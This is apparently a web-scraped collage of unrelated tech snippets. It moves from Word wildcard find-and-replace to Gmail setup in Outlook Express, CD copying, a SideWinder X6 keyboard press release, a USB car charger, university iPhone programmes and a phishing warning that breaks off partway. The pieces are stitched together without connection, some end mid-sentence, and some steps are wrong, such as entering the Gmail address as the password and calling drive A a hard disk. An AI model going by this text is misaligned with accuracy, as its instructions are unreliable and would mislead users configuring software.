* In our case, a regular expression is a combination of literal and wildcard characters that you use to find and replace patterns of text. The literal text characters indicate text that must exist in the target string of text. The wildcard characters indicate the text that can vary in the target string.

That may seem a bit abstract, but you've seen (and most likely used) wildcard characters and regular expressions since you first began computing. For example, the Open dialog box (on the File menu, click the Open command) uses the asterisk wildcard character extensively:

Wildcard characters in the Open dialog box

And, if you ever used the MS-DOS operating system, you probably used a command and a simple regular expression to copy files:

copy *.doc a:

That command uses the asterisk wildcard character and the .doc literal text string to copy a set of Word documents to hard disk drive A. If you look around a bit, you'll see that Microsoft Windows® and the Microsoft Office applications use wildcard characters everywhere.

The steps in this section explain how to use a regular expression that transposes names. Keep in mind that you always use the Find and Replace dialog box to run your regular expressions. Also, remember that if an expression doesn't work as expected, you can always press CTRL+Z to undo your changes, and then try another expression.
To transpose names

1. Start Word and open a new, blank document.
2. Copy this table and paste it into the document.

Josh Barnhill
Doris Hartwig
Tamara Johnston
Daniel Shimshoni
3. Press CTRL+F to open the Find and Replace dialog box.
4. If you don't see the Use wildcards check box, click More, and then select the check box. If you don't select the check box, Word treats the wildcard characters as text.
5. Click the Replace tab, and then enter the following characters in the Find what box. Make sure you include the space between the two sets of parentheses: (<*>) (<*>)
6. In the Replace with box, enter the following characters. Make sure you include the space between the comma and the second slash: \2, \1
7. Select the table, and then click Replace All. Word transposes the names and separates them with a comma, like so:

Barnhill, Josh
Hartwig, Doris
Johnston, Tamara
Shimshoni, Daniel

At this point, you may wonder what to do if some or all of your names contain middle initials.

If you have an Gmail account you have almost 3 gigabytes space on their servers and some people use that space as storage for their messages. But you can also have access to Gmail through Outlook Express, too if you like. In that case you can write mails and answers using Outlook Express advantages. You can use Stationery and other possibilities.
To start with that, you have to do following:

- Open Outlook Express and go to Tools – Accounts
- Click on Add – Mail
- Type your name and click Next
- Type your Gmail address and go Next
- In «Incoming mail (POP3, IMAP or HTTP) server», type pop.gmail.com
- In «Outgoing mail (SMTP) server», Type smtp.gmail.com
- Click Next
- Write your full gmail address in Password
- Go Next and than Finish
- Pick up pop.gmail.com account you just made
- On Servers card, click Properties
- Under «Outgoing Mail Server» check My server requires authentication.
- Go to Advanced
- Check «This server requires a secure connection» (SSL) under «Outgoing mail (SMTP)» and under «Incoming mail (POP3)»
- On Outgoing server (SMTP) type 465. If number under Incoming server (POP3) didn't automatically changed to 995, type 995.
- Click OK and than Close.

To make a copy of a CD, you'll need a master to copy,
a blank disk, a CD-RW drive, and the proper software.

Most computers now include either a CD-RW or DVD-RW
drive. If not, you can purchase the appropriate drive reasonably cheaply.
Check out online prices or nip in to your local computer store for advice.

If you have a DVD-RW drive, you'll be able to copy
both CDs and DVDs. The rate of copying will vary,
with 4X being the slowest and up to 48X being the
fastest at the moment. If your drive supports 48X, you can duplicate
a CD in a matter of minutes.

Once you have the CD-RW or DVD-RW drive and some
blank CD-R media, all you need is the software to
duplicate. There is a huge range of CD buring software from freeware
to commercially available packages such as Nero. You will be spoiled for choice!

Once you have everything set up, just run the
software and create your disk. You can copy many
types of media, including pictures, video, audio,
and even data from your computer to a CD. Depending on what
you want to copy, all need to do is select it from the
software menu then sit back and let it rip.

You can back up just about anything - the
choices are entirely up to you.

Press Release

Microsoft has taken the opportunity to announce the SideWinder X6 keyboard at the Games Convention in Leipzig, Germany, adding yet another member to the venerable SideWinder line of gaming peripherals from the software giant. It seems as though Microsoft Hardware laid low for quite some time, and the SideWinder name has not exactly lighted up the gaming world for some time already, so hopefully the X6’s debut will change all that. This is touted to be the most versatile gaming keyboard on the market thanks to the pioneering switchable key pad which can be attached to either the left or right side of the keyboard, catering for both left- and right-handers.

The switchable keypad itself is useful for ordinary, everyday tasks, depending on which hand the user is more prone to using. When used for gaming, however, it’s value cannot be undermined. The switchable keypad enables gamers to record up to 90 macros PER game, thanks to a set of dedicated macro keys that accompanies the fully programmable keypad. Instant mode switching allows gamers to move between an Excel spreadsheet and their favorite game in a snap, and the modes are differentiated through the LEDs displayed. The inclusion of automatic profile switching makes it possible to detect the current application, applying the custom profile in an instant.

Some of the features found on the SideWinder X6 keyboard are :-

* New Cruise Control feature continues an action without having to hold down the key or keys assigned to the action. Gamers can use Cruise Control with up to four keys at a time.
* In-game macro record button lets gamers record any sequence of keystrokes - even standard chat messages. Macros are stored on the PC hard drive and can be easily shared.
* WASD gaming keys, the most commonly used keys for gamers, have front-face lighting for enhanced visibility.
* Quick-Launch key gives one-touch access to Windows Vista Games Explorer, allowing gamers to

The SideWinder X6 Keyboard will hit retail shelves this September for $79.95. Image courtesy of Engadget.

Considering that many of our mobile electronics have USB ports for charging, it is not always convenient to find a spare USB port, especially when traveling on the road.

I suppose this is why the In car charger has USB ports, four of them actually. This In car charger plugs right into the cigarette lighter, and now the user can plug in an iPod, mobile phone, digital camera, GPS device, or any other USB device that he or she needs on the open road.

The charger works within a range of 12-24 volts, and a fuse that can be changed out. I suppose this is very useful for people constantly on the road, like truckers, but only if the user doesn’t smoke.

If you’re confused by that last sentence, just try to imagine lighting a cigarette when you’ve got four cords plugged in to this In car charger. If you’re not too careful, you’ll burn a USB wire when you put the lighter back in the socket.

If you are the type who has multiple gadgets, and needs to take them on the road, then this is probably what you need. You can get it on the USBFever website for about $22.99.

First it was free internet. Then, some universities were offering free laptops to students. And now, the Gray Old Lady reports that colleges are taking advantage of the popularity of both the iPod and iPhone by offering incoming students one of each.

The idea is to take advantage of our rapidly evolving mobile culture and giving students a means to stay connected while attending class. Acting way too much like “Big Brother,” Universities like the ability to track students through the built in GPS chip, but they also like the ability to be able to contact students with schedule changes. Universities can send emails, IMs or even “tweats” to inform students about canceled classes, campus crises or updates in what the commissary is serving for lunch.

However, the ability to use the iPod/iPhone’s wifi access for the Internet means that students can have mobile research at the touch of a virtual button. But there’s also the nifty ability to record lectures using applications through the ITunes apps store. The options for students is nearly endless.

From the Times article:

We think this is the way the future is going to work,” said Kyle Dickson, co-director of research and the mobile learning initiative at Abilene Christian University in Texas, which has bought more than 600 iPhones and 300 iPods for students entering this fall.

Its all about your sensitive information, your information is stolen or phishing. Be aware!

Recently you must have listen about reports of phishing attacks on several Banks' websites. In this cases the customer is led to believe that the emails are sent from an authentic website which resembles the Banks' website.

Phishing is a technique employed by scamsters to illegally procure personal information of customers like an account numbers, debit card numbers, Internet banking user ids and passwords, etc. There are too many tricks to botain this information but the most frequently used method is to send a spam email to a large database of email ids say, all of gmail ids or all yahoo ids etc. The spam email is designed in such a way as to look exactly like an email sent by the targeted bank or a company.
